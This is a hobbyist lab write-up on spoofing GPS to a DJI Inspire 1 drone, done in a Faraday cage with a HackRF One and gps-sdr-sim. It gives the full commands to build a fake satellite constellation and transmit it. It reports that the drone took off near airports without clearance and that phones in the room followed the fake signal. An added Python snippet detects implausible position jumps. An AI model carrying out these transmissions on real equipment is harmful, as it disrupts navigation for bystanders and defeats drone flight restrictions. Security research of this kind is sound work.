🛰️

DJI Inspire 1 GPS spoofing

⚠️
All of the RF emissions were made inside a Faraday cage.

Introduction

I took a week-long class on RF security, and we ended up with some ideas to try. One of them was to spoof the GPS signal on various devices.

The device that I decided to target was my DJI Inspire 1 drone.

Configuring the HackRF for Kali Linux

The first step is to be able to use the HackRF device with our virtual machine.

┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo apt install hackrf
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo hackrf_info

Installation of GPS Spoof

The next step is to install GPS Spoof, which generates the data that simulates our GPS constellation and that we will send to our device.

┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ mkdir GPS_SPOOF
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ cd GPS_SPOOF
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo git clone https://github.com/osqzss/gps-sdr-sim.git
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ cd gps-sdr-sim
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo gcc gpssim.c -lm -O3 -o gps-sdr-sim -DUSER_MOTION_SIZE=4000
gps-sdr-sim (Software-Defined GPS Signal Simulator): https://github.com/osqzss/gps-sdr-sim

Time to create our fake constellation

Getting the real GPS constellation information

To create our fake constellation, we need to locate the real GPS satellites. This is done using the GPS broadcast ephemeris file. The archive of daily files can be downloaded here (Earthdata Login):

https://cddis.nasa.gov/archive/gnss/data/daily/

These files are used to generate the simulated pseudorange and Doppler for the satellites in range.

This simulated range data is then used to generate digitized I/Q samples for the GPS signal.

⚠️
Make certain you download the most recent daily file.

Finding the desired location

Then, select a location you want to spoof. In my case, I want to appear to be in North Korea, specifically at Kumnung Tunnel, in Pyongyang.

You can go to Google Maps to get the GPS coordinates. In my case, the coordinates are:

39.035688, 125.753282

Generating the fake constellation

To generate the GPS spoof, I used the following command with the ephemeris file and the GPS coordinates, as follows:

┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo ./gps-sdr-sim -b 8 -e ../../Desktop/brdc1450.23n -l "39.035688, 125.753282, 100"

This will create a file called gpssim.bin. This file, once played over the HackRF, will simulate the GPS constellation.

Let’s travel!

To send the freshly generated file to the HackRF One, and by extension to our drone, here is the command used:

┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0

Setting up the lab

The setup is the following: my laptop running a Kali Linux VM is connected to a HackRF One. The output of the HackRF One is plugged into a +20 dB amplifier and then a 1.5 m antenna.

Results on the Inspire 1

Traveling around the world

Here it was in Pyongyang, North Korea

We also made it to Japan

We also encountered some weird movements while trying to reach Japan, and ended up near Tunisia for some unknown reason.
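Position jumps like the ones above are what a receiver-side plausibility check is meant to catch. The Python code below is an added example, not part of the original post: it flags any fix that could not be reached from the previous one at a realistic speed. The 30 m/s ceiling, the starting coordinates of the sample track and the function names are assumptions; only the destination coordinates come from this page.

```python
import math

EARTH_RADIUS_M = 6_371_000.0
MAX_SPEED_MPS = 30.0  # assumed speed ceiling for a small quadcopter; tune per platform


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two lat/lon points (degrees)."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(min(1.0, math.sqrt(a)))


def find_jumps(fixes, max_speed=MAX_SPEED_MPS):
    """Return (index, distance_m, implied_speed_mps) for each fix that cannot be
    reached from the previous one at max_speed. fixes: list of (unix_s, lat, lon)."""
    alerts = []
    for i in range(1, len(fixes)):
        t0, lat0, lon0 = fixes[i - 1]
        t1, lat1, lon1 = fixes[i]
        dist = haversine_m(lat0, lon0, lat1, lon1)
        dt = t1 - t0
        if dt <= 0:
            # Receiver time stalled or ran backwards: report it, never divide by it.
            alerts.append((i, dist, math.inf))
        elif dist / dt > max_speed:
            alerts.append((i, dist, dist / dt))
    return alerts


# Constructed 1 Hz track: three near-stationary fixes at an arbitrary start point,
# then the receiver locks onto a simulated constellation at the page's coordinates.
SAMPLE_TRACK = [
    (0, 48.856600, 2.352200),
    (1, 48.856610, 2.352210),
    (2, 48.856605, 2.352205),
    (3, 39.035688, 125.753282),
    (4, 39.035690, 125.753285),
]

if __name__ == "__main__":
    for idx, dist, speed in find_jumps(SAMPLE_TRACK):
        print(f"fix {idx}: moved {dist / 1000:.0f} km, implied speed {speed:.0f} m/s")
```

Only the fix where the track switches to the simulated position is reported; the small jitter before and after it stays below the threshold.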

Let’s fly in restricted places

We also tried to move it to some random airports to see if it would let us take off.

And it turns out they ask us if we have clearance to take off.

However, if I say I don’t have clearance, the drone can take off anyway.

Unexpected side effects

The other people in the room quickly noticed some side effects of this constellation simulation: most of the applications using localisation were using the simulated constellation instead of the official one. Multiple locations were tried during the day; here are some of the results.